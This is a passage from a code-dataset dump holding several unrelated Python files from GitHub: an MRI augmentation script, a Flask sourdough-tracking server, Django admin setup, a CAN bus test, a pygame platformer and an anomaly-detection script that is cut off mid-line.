__future__ import print_function\nimport os,sys\nimport nibabel as nib\nimport random\nimport time\nimport scipy.ndimage\nimport pandas as pd\nimport numpy as np\nnp.seterr(all='raise')\nfrom subprocess import check_call\n\n\n\ndef normalize(img):\n m=np.mean(img)\n st=np.std(img)\n norm = (img - m) / st\n return norm\n\ndef swap_axes(img):\n img = np.swapaxes(img,0,2)\n img = img[::-1, ::-1, :]\n sh=np.asarray(img.shape)\n img = np.swapaxes(img,2,np.argmin(sh))\n return img\n\ndef pad_img(img,c=(0,0,0)):\n # c is corner where to locate image\n blank=np.zeros((256,256,64))\n blank[c[0]:c[0]+img.shape[0],c[1]:c[1]+img.shape[1],c[2]:c[2]+img.shape[2]]=img\n return blank\n\ndef resize_img(img,img_shape):\n size=list(img_shape)\n zoom=[1.0*x/y for x, y in zip(size, img.shape)]\n return scipy.ndimage.zoom(img, zoom=zoom)\n\ndef get_subj_data(p,input_size=(256,256,64,1)):\n img_shape=input_size[:-1]\n subj_data = np.zeros(input_size)\n affine=np.eye(len(np.squeeze(subj_data.shape)))\n if '.mnc.gz' in p:\n img = nib.load(p)\n data = img.get_data()\n data = swap_axes(data)\n # print(data.shape)\n if any(np.asarray(data.shape)>np.asarray(img_shape)):\n data=resize_img(data,img_shape)\n # data = normalize(data)\n data = pad_img(data)\n subj_data = np.reshape(data,input_size)\n return subj_data,img.affine\n else:\n print(\"File is not mnc.gz : {}\".format(p))\n return subj_data,affine\n\n\ndef random_rotate(subj_data):\n input_shape = subj_data.shape\n # maximum angle to define range\n max_angle = 5\n\n # rotate along (x,y) plane\n alpha = random.uniform(-max_angle,max_angle)\n subj_data = scipy.ndimage.rotate(subj_data, alpha, axes=(0,1),reshape=True)\n # rotate along (x,z) plane\n beta = random.uniform(-max_angle,max_angle)\n subj_data = scipy.ndimage.rotate(subj_data, beta, axes=(0,2),reshape=True)\n # rotate along (y,z) plane\n theta = random.uniform(-max_angle,max_angle)\n subj_data = scipy.ndimage.rotate(subj_data, theta, axes=(1,2),reshape=True)\n # reshape=True above changes the size of the image to we need to resize\n subj_data = resize_img(subj_data,input_shape)\n return subj_data\n\n\ndef random_translation(subj_data):\n input_shape = subj_data.shape\n # wall size will be 5 voxels\n wall = 5\n img_shape_small = tuple(i-wall for i in input_shape[:-1]) + (1,)\n subj_data_small = resize_img(subj_data,img_shape_small)\n corner = tuple([random.randint(0,wall) for i in range(3)])\n subj_data = pad_img(np.squeeze(subj_data_small),c=corner)\n subj_data = np.reshape(subj_data,input_shape)\n return subj_data\n\n\ndef random_flip_xyz(subj_data):\n flip_x = random.randint(0,1)*2-1\n flip_y = random.randint(0,1)*2-1\n flip_z = random.randint(0,1)*2-1\n return subj_data[::flip_x, ::flip_y, ::flip_z, :]\n\ndef random_brightness(subj_data):\n amplitude = np.abs(1*random.gauss(0,1))+1\n brighter = random.randint(0,1)\n if not brighter:\n amplitude = 1.0/amplitude\n return amplitude*subj_data\n\n\n\ndef data_augment(subj_data):\n # random rotation along (x,y), (x,z) and (y,z)\n subj_data = random_rotate(subj_data)\n # random translation in either x, y, and z\n subj_data = random_translation(subj_data)\n # random flip in the x, y, and/or z\n # subj_data = random_flip_xyz(subj_data)\n # amplify by floating number, will brighten if > 1.0 and dim if < 1.0\n # subj_data = random_brightness(subj_data)\n return subj_data\n\n\n\ndef save_to_nii(data,affine,fn):\n # data = data.reshape(data.shape+(1,))\n # affine=np.eye(len(data.shape))\n img_nii = nib.Nifti1Image(data,affine)\n if not os.path.isfile(fn+'.gz'):\n print('Saving augmented data to gun zipped file : {}'.format(fn+'.gz'))\n nib.save(img_nii,fn)\n check_call(['gzip', fn])\n else:\n print('File {} already exists'.format(fn+'.gz'))\n\n\n\n\nview=False\n\n# Book keeping\nprint(\"Executing:\",__file__)\nprint(\"Contents of the file during execution:\\n\",open(__file__,'r').read())\n\n# This will have the directory and the label\npath = '/home/rpizarro/noise/XValidFns/multiple_artifact/clean_percent_098/XV0'\n# XV_set = 'XV0'\ntrain_fn = '/home/rpizarro/noise/XValidFns/single_artifact/clean_percent_050/XV0/train.art123.csv'\ndf_done = pd.read_csv(train_fn,index_col=0)\n# valid_fn = os.path.join(path,'valid.art123.csv')\n# valid = pd.read_csv(valid_fn,index_col=0)\n\nprint(df_done.shape)\n\n\n# training file to be augmented\nfn = '/data/datasets/shared/rpizarro/noise/weights/rap_NN008_multiple_artifact/clean_percent_050/XV0/nb_classes_02/nb_samples_factor_01.00/001-CLR-trg12_NN8mod_priming_ep500/train.art123.ep419.csv'\ndf = pd.read_csv(fn,index_col=0)\n\ncol_list = list(df)\ncol_list.remove('path')\ninput_size=(256,256,64,1)\n\nfor da_idx in [4]: # range(5):\n print('Going through data augmentation number : {}'.format(da_idx))\n start_da = time.time()\n\n train_aug_fn = os.path.join(path,'augmented','train.art123.aug{0:03d}.csv'.format(da_idx))\n df_aug = pd.DataFrame(columns=list(df))\n\n for idx in range(df.shape[0]):\n start_idx = time.time()\n f_orig = df.iloc[[idx]].path.values[0]\n subj_label = df.iloc[[idx]][col_list].values.tolist()[0]\n print(\"{} : {} : {}\".format(idx,subj_label,f_orig))\n\n f_orig_dir = os.path.dirname(f_orig)\n\n if f_orig in set(df_done['path']):\n f_aug_dir = f_orig_dir.replace('data/datasets','data2/datasets/aug')\n f_aug_base = os.path.basename(f_orig).replace('.mnc.gz','_aug{0:03d}.nii'.format(da_idx))\n f_aug = os.path.join(f_aug_dir,f_aug_base)\n row = pd.DataFrame([subj_label+[f_aug+'.gz']],columns=list(df))\n df_aug = df_aug.append(row,ignore_index=True)\n print('Skipping since we already augmented : {}'.format(f_orig))\n continue\n\n print('Could not find so we will augment idx : {}'.format(idx))\n\n f_aug_dir = f_orig_dir.replace('data/datasets','data/datasets/shared/rpizarro/aug')\n if not os.path.exists(f_aug_dir):\n print('Does not exist so we are creating dir : {}'.format(f_aug_dir))\n os.makedirs(f_aug_dir)\n f_aug_base = os.path.basename(f_orig).replace('.mnc.gz','_aug{0:03d}.nii'.format(da_idx))\n f_aug = os.path.join(f_aug_dir,f_aug_base)\n f_aug_gz = f_aug+'.gz'\n row = pd.DataFrame([subj_label+[f_aug_gz]],columns=list(df))\n df_aug = df_aug.append(row,ignore_index=True)\n\n if os.path.exists(f_aug_gz):\n print('We have already augmented : {}'.format(f_aug_gz))\n continue\n \n subj_data,affine = get_subj_data(f_orig,input_size)\n subj_data = data_augment(subj_data) \n save_to_nii(subj_data,affine,f_aug)\n\n elapsed_idx = time.time() - start_idx\n print('Time it took to augment one file : {0:0.2f} seconds'.format(elapsed_idx))\n\n elapsed_da = time.time() - start_da\n print('Time it took to augment {0} files : {1:0.2f} minutes'.format(idx,elapsed_da/60.0))\n\n print('Saving list of augmented files to : {}'.format(train_aug_fn))\n df_aug.to_csv(train_aug_fn)\n\n\n\n","repo_name":"AS-Lab/Pizarro-et-al-2023-DL-detects-MRI-artifacts","sub_path":"research/exp/noise.augment_data.py","file_name":"noise.augment_data.py","file_ext":"py","file_size_in_byte":7176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26426724759","text":"from typing import List\n\nfrom sourdough.db.models.feeding_actions_table import FeedingActionModel\nfrom sourdough.db.models.extractions_table import ExtractionModel\nfrom sourdough.db.models.refrigerator_actions_table import RefrigeratorActionModel\nfrom sourdough.db.models.sourdough_table import SourdoughModel\nfrom sourdough.db.models.sourdough_targets_table import SourdoughTargetModel\nfrom sourdough.db.models.user_table import UserModel\nfrom sourdough.db.orm_config import Session, Base, engine\nfrom flask import Flask, request, jsonify\nimport datetime\nimport json\n\nfrom sourdough.communication.actions import RefrigerationAction, FeedingAction, ExtractionAction, Action\nfrom sourdough.communication.messages import PerformActionsMessage, SuccessMessage, FailedMessage, InfoMessage\n\napp = Flask(__name__)\n\n\n# A flask function to create an account and it's sourdough, and adding them to the database.\n@app.route('/create_account', methods=[\"GET\", \"POST\"])\ndef create_account():\n with Session() as session:\n data = request.args\n name = data['name']\n last_name = data['last_name']\n email = data['email']\n if session.query(session.query(UserModel).filter_by(email=email).exists()).scalar():\n message = FailedMessage(\"User already exists.\")\n return json.dumps(message.to_dict())\n else:\n my_user_model = UserModel(name=name, last_name=last_name, email=email)\n session.add(my_user_model)\n session.flush()\n my_sourdough_model = SourdoughModel(user_id=my_user_model.id)\n session.add(my_sourdough_model)\n session.flush()\n not_in_fridge = RefrigeratorActionModel(sourdough_id=my_sourdough_model.id, in_or_out=\"out\")\n session.add(not_in_fridge)\n session.commit()\n message = SuccessMessage(\"Success\")\n return json.dumps(message.to_dict())\n\n\n# A flask function to see all the users in the database.\n@app.route('/show_all_users', methods=[\"GET\", \"POST\"])\ndef show_all_users():\n with Session() as session:\n users = session.query(UserModel).all()\n return_list = [str(user) for user in users]\n return_str = str(return_list)\n return jsonify(return_str)\n\n\n@app.route('/sourdough_info', methods=[\"GET\", \"POST\"])\ndef sourdough_info():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n user_model = get_user(user_email, session)\n sourdough_model: SourdoughModel = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n infos = []\n if len(sourdough_model.upcoming_sourdough_targets) > 0:\n infos.append(f\"target in {sourdough_model.next_sourdough_target.days_from_today} days from today\")\n infos.append(f\"fridge status: {sourdough_model.in_refrigerator}\")\n infos.append(f\"sourdough weight: {sourdough_model.weight}\")\n info_message = InfoMessage(\"\\n\".join(infos))\n return json.dumps(info_message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n# A flask function to add a new sourdough target to the database for the specified user provided from the email.\n@app.route('/add_a_target', methods=[\"GET\", \"POST\"])\ndef adding_a_sourdough_target():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n date_of_action = request.args.get('date_of_action')\n date = datetime.datetime.fromisoformat(date_of_action)\n sourdough_weight_target = request.args.get('sourdough_weight_target_in_grams')\n user_model = get_user(user_email, session)\n my_target_model = SourdoughTargetModel(sourdough_id=user_model.id,\n date_of_action=date,\n sourdough_weight_target_in_grams=int(sourdough_weight_target))\n session.add(my_target_model)\n session.commit()\n message = SuccessMessage(\"Added sourdough target successfully\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function to add a new feeding action to the database for the specified user provided from the email.\n@app.route('/add_a_feeding_action', methods=[\"GET\", \"POST\"])\ndef adding_a_feeding_action():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n water_weight = request.args.get('water_weight_added_in_grams')\n flour_weight = request.args.get('flour_weight_added_in_grams')\n user_model = get_user(user_email, session)\n my_feeding_action_model = FeedingActionModel(sourdough_id=user_model.id,\n water_weight_added_in_grams=int(water_weight),\n flour_weight_added_in_grams=int(flour_weight))\n session.add(my_feeding_action_model)\n session.commit()\n message = SuccessMessage(\"Added a feeding action successfully.\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function to add a new extraction action to the database for the specified user provided from the email.\n@app.route('/add_extraction', methods=[\"GET\", \"POST\"])\ndef adding_extraction():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n sourdough_weight_extracted = request.args.get('sourdough_weight_used_in_grams')\n user_model = get_user(user_email, session)\n my_extraction_model = ExtractionModel(sourdough_id=user_model.id,\n sourdough_weight_used_in_grams=int(sourdough_weight_extracted))\n session.add(my_extraction_model)\n session.commit()\n message = SuccessMessage(\"Added an extraction action successfully.\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function to add a new refrigeration action to the database for the specified user provided from the email.\n@app.route('/add_a_refrigerator_action', methods=[\"GET\", \"POST\"])\ndef adding_a_refrigerator_action():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n in_or_out = request.args.get('in_or_out')\n user_model = get_user(user_email, session)\n my_sourdough = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n if my_sourdough.last_refrigerator_action.in_or_out == in_or_out:\n raise Exception(\"Sourdough refrigeration state must be different\")\n my_refrigerator_action_model = RefrigeratorActionModel(sourdough_id=my_sourdough.id, in_or_out=in_or_out)\n session.add(my_refrigerator_action_model)\n session.commit()\n message = SuccessMessage(\"Added a refrigeration action successfully.\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function that returns the sourdough starter weight for the specified user provided from the email.\n@app.route('/my_sourdough_starter_weight', methods=[\"GET\", \"POST\"])\ndef my_sourdough_starter_weight():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n user_model = get_user(user_email, session)\n my_sourdough = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n my_weight = my_sourdough.weight\n return json.dumps(my_weight)\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\ndef keep_sourdough_at_maintenance(sourdough_model) -> List[Action]:\n actions_to_perform = list()\n\n if sourdough_model.in_refrigerator:\n if sourdough_model.days_in_refrigerator > 10:\n # if sourdough is too long in the fridge, extract from it so it reaches minimum maintenance weight\n if not sourdough_model.extracted_today:\n extract = ExtractionAction(sourdough_model.weight - sourdough_model.min_maintenance_weight)\n actions_to_perform.append(extract)\n elif sourdough_model.fed_today:\n # if already extracted, feed it by its own weight\n feed = FeedingAction(sourdough_model.weight, sourdough_model.weight)\n actions_to_perform.append(feed)\n else:\n \"\"\"\n sourdough is at maintenance and isnt too long in the fridge. do nothing\n \"\"\"\n\n else:\n # sourdough in maintenance must be in fridge\n fridge_action = RefrigerationAction(\"in\")\n actions_to_perform.append(fridge_action)\n\n return actions_to_perform\n\n\n@app.route('/my_action_today', methods=[\"GET\", \"POST\"])\ndef my_action_today():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n user_model = get_user(user_email, session)\n sourdough_model: SourdoughModel = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n\n actions_to_perform = list()\n\n if sourdough_model.has_upcoming_targets:\n next_sourdough_target = sourdough_model.next_sourdough_target\n if next_sourdough_target.days_from_today > 3:\n # if target is more than 3 days in the future, keep at maintenance\n actions_to_perform += keep_sourdough_at_maintenance(sourdough_model)\n\n elif 0 < next_sourdough_target.days_from_today <= 3:\n # if in the 3 last days before target, feed to triple weight every day\n if sourdough_model.in_refrigerator:\n fridge_action = RefrigerationAction(\"out\")\n actions_to_perform.append(fridge_action)\n if not sourdough_model.fed_today:\n feed = FeedingAction(sourdough_model.weight, sourdough_model.weight)\n actions_to_perform.append(feed)\n\n elif next_sourdough_target.days_from_today == 0:\n # if today is the target day, feed until target weight\n missing_weight = next_sourdough_target.sourdough_weight_target_in_grams - sourdough_model.weight\n feed = FeedingAction(missing_weight / 2, missing_weight / 2)\n actions_to_perform.append(feed)\n else:\n # sourdough has no upcoming targets\n actions_to_perform += keep_sourdough_at_maintenance(sourdough_model)\n\n # send message back to requester\n message = PerformActionsMessage(actions_to_perform)\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A function to check if the user with the given email is saved in the database, and returns the UserModel object.\n# If the user is not in the database, returns an exception.\ndef get_user(email, session) -> UserModel:\n try:\n return session.query(UserModel).filter_by(email=email).one()\n except Exception as e:\n print(f\"User do not exist: {repr(e)}\")\n raise Exception(\"There is no user with this email.\")\n\n\n@app.route('/is_user_in_database', methods=[\"GET\", \"POST\"])\ndef is_user_in_db():\n with Session() as session:\n try:\n data = request.args\n email = data['email']\n if session.query(session.query(UserModel).filter_by(email=email).exists()).scalar():\n message = SuccessMessage(\"Success\")\n return json.dumps(message.to_dict())\n else:\n raise Exception(\"There is no user with this email.\")\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)\n app.run()\n","repo_name":"noadudai/sourdough","sub_path":"sourdough/server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12796995018","text":"\"\"\"\n Author: Cristian Gonzales\n Created for UCSC undergrad course CMPS 128, Fall 2017\n\"\"\"\nfrom flask import Flask\n\n\"\"\"\n Global variables for the entire codebase are initialized here.\n \n Global variables\n --------------------\n :var app: The Flask app to be run (e.g., app.run(...))\n :var local_server: The server for this instance, to be ran globally\n :var numOfReplicas: The number of K replicas, as indicated by the environment variable\n :var localIPPort: The localIPPort for this specific instance in the form of IP:PORT (an identifier to query for objects)\n :var KVSDict: The key-value store, global to all \n :var viewList: The global view of all nodes\n :var live_servers: All the live servers, or servers that are \"up\"\n :var absent_servers: All the servers that are \"down\"\n\"\"\"\nclass globals:\n def __init__(self):\n\n global app\n app = Flask(__name__)\n\n global local_server\n\n global numOfReplicas\n\n global localIPPort\n\n global KVSDict\n KVSDict = dict()\n\n global viewList\n viewList = []\n\n global live_servers\n live_servers = []\n\n global absent_servers\n absent_servers = []","repo_name":"Vacio/cmps128","sub_path":"legacy/src/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40463785067","text":"import os\nimport cv2\n\nclass YelpImageDataset(object):\n\tdef __init__(self, path):\n\t\tself.train_imgs = []\n\t\tself.surf_features = []\n\t\tself.sift_features = []\n\t\timages = os.listdir(path)\t\n\t\tfor i in range(len(images)):\n\t\t\tnewpath = '/%s' % images[i]\n\t\t\tnewpath = path + newpath\n\t\t\timg = cv2.imread('%s' % newpath, 0)\n\t\t\tself.train_imgs.append(img)\n\n\tdef define_surf_features(self):\n\t\tsurf = cv2.xfeatures2d.SURF_create(400)\n\t\tsurf.setExtended(True)\n\t\tfor i in range(len(self.train_imgs)):\n\t\t\t(kp, des) = surf.detectAndCompute(self.train_imgs[i], None)\n\t\t\tself.surf_features.append((kp,des))\n\n\tdef define_sift_features(self):\n\t\tsift = cv2.xfeatures2d.SIFT_create()\n\t\tfor i in range(len(self.train_imgs)):\n\t\t\tkp = sift.detectAndCompute(self.train_imgs[i], None)\n\t\t\tself.sift_features.append(kp)\n\n","repo_name":"anGie44/YelpPhotoClassification","sub_path":"scripts/imgData.py","file_name":"imgData.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19235937724","text":"from django.contrib import admin\n\nfrom .models import (\n UserProfile, Post , Comment, Tender,BirthCertificate,VDetails,Feedback, DeathCertificate\n)\n\n# Register your models here.\nadmin.site.register(UserProfile)\nadmin.site.register(Post)\nadmin.site.register(Comment)\nadmin.site.register(VDetails)\nadmin.site.register(Tender)\nadmin.site.register(Feedback)\nadmin.site.register(BirthCertificate)\nadmin.site.register(DeathCertificate)\n# admin.site.register(OfficeEmployee)\nfrom django.contrib import admin\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.forms.models import inlineformset_factory\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\n\ndef upgrade_user_admin(UserProfile=None, unique_email=False,\n list_display=None):\n \"\"\"This helper function enhances the built in auth.user admin as follows:\n - If given a UserProfile class, allow it to be edited inline in the\n user admin.\n - Add \"make active\" and \"make inactive\" actions to the actions dropdown\n - Alters list_display if provided\n - Add date joined and last login filters\n - Add the email field to the first step when creating a user\n - Optionally enforce unique emails at the form level\n Usage:\n from upgrade_user_admin import upgrade_user_admin\n from myapp.models import MyUserProfile\n upgrade_user_admin(\n UserProfile=MyUserProfile, unique_email=True,\n list_display=['email', 'first_name', 'last_name'])\n \"\"\"\n if UserProfile:\n class UserProfileFormSet(inlineformset_factory(User, UserProfile)):\n def __init__(self, *args, **kwargs):\n super(UserProfileFormSet, self).__init__(*args, **kwargs)\n self.can_delete = False\n\n # Allow user profiles to be edited inline with User\n class UserProfileInline(admin.StackedInline):\n model = UserProfile\n fk_name = 'user'\n max_num = 1\n extra = 0\n formset = UserProfileFormSet\n\n # use these form classes to enforce unique emails, if required\n class UniqueEmailForm:\n def clean_email(self):\n qs = User.objects.filter(email=self.cleaned_data['email'])\n if self.instance:\n qs = qs.exclude(pk=self.instance.pk)\n if qs.count():\n raise forms.ValidationError(\n 'That email address is already in use')\n else:\n return self.cleaned_data['email']\n\n class MyUserChangeForm(UniqueEmailForm, UserChangeForm):\n email = forms.EmailField(required=True)\n\n class MyUserCreationForm(UniqueEmailForm, UserCreationForm):\n email = forms.EmailField(required=True)\n\n class MyUserAdmin(UserAdmin):\n # add the email field in to the initial add_user form\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('username', 'email', 'password1', 'password2')\n }),\n )\n\n inlines = [UserProfileInline, ] if UserProfile else []\n actions = ['make_active', 'make_inactive']\n list_filter = ['is_active', 'is_staff', 'is_superuser', 'date_joined',\n 'last_login']\n\n form = MyUserChangeForm if unique_email else UserChangeForm\n add_form = MyUserCreationForm if unique_email else UserCreationForm\n\n def make_active(self, request, queryset):\n rows_updated = queryset.update(is_active=True)\n if rows_updated == 1:\n message_bit = \"1 person was\"\n else:\n message_bit = \"%s people were\" % rows_updated\n self.message_user(\n request, \"%s successfully made active.\" % message_bit)\n\n def make_inactive(self, request, queryset):\n rows_updated = queryset.update(is_active=False)\n if rows_updated == 1:\n message_bit = \"1 person was\"\n else:\n message_bit = \"%s people were\" % rows_updated\n self.message_user(\n request, \"%s successfully made inactive.\" % message_bit)\n\n if list_display:\n MyUserAdmin.list_display = list_display\n\n # Re-register UserAdmin with custom options\n admin.site.unregister(User)\n admin.site.register(User, MyUserAdmin)\n","repo_name":"Nizam35/GramPanchayath","sub_path":"mysite/grama/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14828491091","text":"#############################################################################################################\n\n## Description : This codes is for test two USB2CAN module commuincation\n## on one Raspberry Pi. \n## CAN0 send base frame/extended frame/remote frame\n## CAN1 receivd frame and print \n\n## Author : Calvin (calvin@inno-maker.com)/ www.inno-maker.com\n \n \n## Date : 2022.08.01\n\n## Environment : Hardware ---------------------- Raspberry Pi 4\n## SYstem of RPI ---------------------- 2022-04-04-raspbian-buster-full.img 64 bit\n## Version of Python ---------------------- Python 3.7.3(Default in the system)\n## Toinstall dependencies:\n## sudo pip3 install python-can\n\n#############################################################################################################\nimport os\nimport can\n\ndef can_test():\n #Set CAN0 speed to 1M bps\n os.system('sudo ifconfig can0 down')\n os.system('sudo ip link set can0 type can bitrate 1000000')\n os.system(\"sudo ifconfig can0 txqueuelen 100000\")\n os.system('sudo ifconfig can0 up')\n\n #Set CAN1 speed to 1M bps\n os.system('sudo ifconfig can1 down')\n os.system('sudo ip link set can1 type can bitrate 1000000')\n os.system(\"sudo ifconfig can1 txqueuelen 100000\")\n os.system('sudo ifconfig can1 up')\n \n can0 = can.interface.Bus(channel = 'can0', bustype = 'socketcan')\n can1 = can.interface.Bus(channel = 'can1', bustype = 'socketcan')\n \n ## CAN0 send Base frame , CAN 1 receive this frame and print. \n sff_frame = can.Message(arbitration_id=0x123, data=[0,1,2,3,4,5,6,7])\n can0.send(sff_frame)\n msg = can1.recv(10.0)\n if msg is None:\n print(\"USB2CAN hardware connection failure.\")\n else:\n print(f\"Received base frame: \\n{msg}\\n\")\n ###################################################################### \n ## CAN0 send extended frame, CAN 1 receive this frame and print. \n eff_frame = can.Message(arbitration_id=0x1FFF6666, data=[7,6,5,4,3,2,1,0],is_extended_id = True)\n can0.send(eff_frame)\n msg = can1.recv(10.0)\n if msg is None:\n print(\"USB2CAN hardware connection failure.\")\n else:\n print(f\"Received extended frame: \\n{msg}\\n\")\n ###################################################################### \n ##CAN0 send remote frame, CAN 1 receive this frame and print.\n rtr_frame = can.Message(arbitration_id=0x321, data=[0,1,2,3,4,5,6,7],is_remote_frame = True) \n can0.send(rtr_frame)\n msg = can1.recv(10.0)\n if msg is None:\n print(\"USB2CAN hardware connection failure.\")\n else:\n print(f\"Received remote frame: \\n{msg}\\n\") \n ###################################################################### \n os.system('sudo ifconfig can1 down')\n os.system('sudo ifconfig can0 down')\n \n \nif __name__ == '__main__':\n can_test()\n\n\n\n","repo_name":"INNO-MAKER/usb2can","sub_path":"For Linux Raspbian Ubuntu/software/python3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"31"} +{"seq_id":"17943782863","text":"import pygame\nimport sys\nfrom game.player import Player\nfrom game.level1 import Level1\n\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 700\n\n\ndef main():\n pygame.init()\n\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\n pygame.display.set_caption('Cross Dimensional Platformer')\n\n player_image = pygame.image.load(\"img/anim1.png\").convert_alpha()\n player_image = pygame.transform.scale(player_image, (60, 60))\n\n background_image1 = pygame.image.load(\"img/Hills Layer 01.png\").convert_alpha()\n background_image1 = pygame.transform.scale(background_image1, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image2 = pygame.image.load(\"img/Hills Layer 02.png\").convert_alpha()\n background_image2 = pygame.transform.scale(background_image2, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image3 = pygame.image.load(\"img/Hills Layer 03.png\").convert_alpha()\n background_image3 = pygame.transform.scale(background_image3, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image4 = pygame.image.load(\"img/Hills Layer 04.png\").convert_alpha()\n background_image4 = pygame.transform.scale(background_image4, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image5 = pygame.image.load(\"img/Hills Layer 05.png\").convert_alpha()\n background_image5 = pygame.transform.scale(background_image5, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n player = Player(player_image, SCREEN_WIDTH)\n current_level = Level1(player)\n\n sprite_list = pygame.sprite.Group()\n sprite_list.add(player)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if not current_level.level_passed:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n player.move_right = True\n elif event.key == pygame.K_LEFT:\n player.move_left = True\n elif event.key == pygame.K_UP:\n player.jump()\n elif event.key == pygame.K_f:\n current_level.handle_rift_close()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n player.move_right = False\n elif event.key == pygame.K_LEFT:\n player.move_left = False\n\n screen.fill((0, 0, 0))\n sprite_list.update()\n current_level.update()\n\n screen.blit(background_image1, (0, 0))\n screen.blit(background_image2, (0, 0))\n screen.blit(background_image3, (0, 0))\n screen.blit(background_image4, (0, 0))\n screen.blit(background_image5, (0, 0))\n\n current_level.draw(screen)\n sprite_list.draw(screen)\n\n if current_level.level_passed:\n large_text = pygame.font.Font('freesansbold.ttf', 115)\n text_surface = large_text.render(\"Level Passed!\", True, (0, 0, 0))\n text_rect = text_surface.get_rect()\n text_rect.center = ((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))\n screen.blit(text_surface, text_rect)\n player.move_left = False\n player.move_right = False\n\n pygame.display.flip()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andy-wojciechowski/msoe-spring-game-jam-2019","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22160336339","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 5 12:46:55 2018\n\n@author: Joe\n\"\"\"\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nfrom sklearn.metrics import f1_score\n\nplt.style.use('ggplot')\nplt.rcParams['font.family'] = 'serif'\nplt.rcParams['font.serif'] = 'Ubuntu'\nplt.rcParams['font.monospace'] = 'Ubuntu Mono'\nplt.rcParams['font.size'] = 12\nplt.rcParams['axes.labelsize'] = 11\nplt.rcParams['axes.labelweight'] = 'bold'\nplt.rcParams['axes.titlesize'] = 12\nplt.rcParams['xtick.labelsize'] = 9\nplt.rcParams['ytick.labelsize'] = 9\nplt.rcParams['legend.fontsize'] = 11\nplt.rcParams['figure.titlesize'] = 13\n\n\ndef feature_normalize(dataset):\n mu = np.mean(dataset,axis=0)\n sigma = np.std(dataset,axis=0)\n return (dataset - mu)/sigma\n\ndef estimateGaussian(dataset):\n mu = np.mean(dataset, axis=0)\n sigma = np.cov(dataset.T)\n return mu, sigma\n \ndef multivariateGaussian(dataset,mu,sigma):\n p = multivariate_normal(mean=mu, cov=sigma)\n return p.pdf(dataset)\n\ndef selectThresholdByCV(probs,gt):\n best_epsilon = 0\n best_f1 = 0\n f = 0\n stepsize = (max(probs) - min(probs)) / 1000;\n epsilons = np.arange(min(probs),max(probs),stepsize)\n for epsilon in np.nditer(epsilons):\n predictions = (probs < epsilon) \n f = f1_score(gt, predictions,average='binary')\n if f > best_f1:\n best_f1 = f\n best_epsilon = epsilon\n \n return best_f1, best_epsilon\n\ntr_data = pd.read_csv('tr_server_data.csv')\ncv_data = pd.read_csv('cv_server_data.csv')\ngt_data = pd.read_csv('gt_server_data.csv')\n\nn_training_samples = tr_data.shape[0]\nn_dim = tr_data.shape[1]\n\nprint('Number of datapoints in training set: %d' % 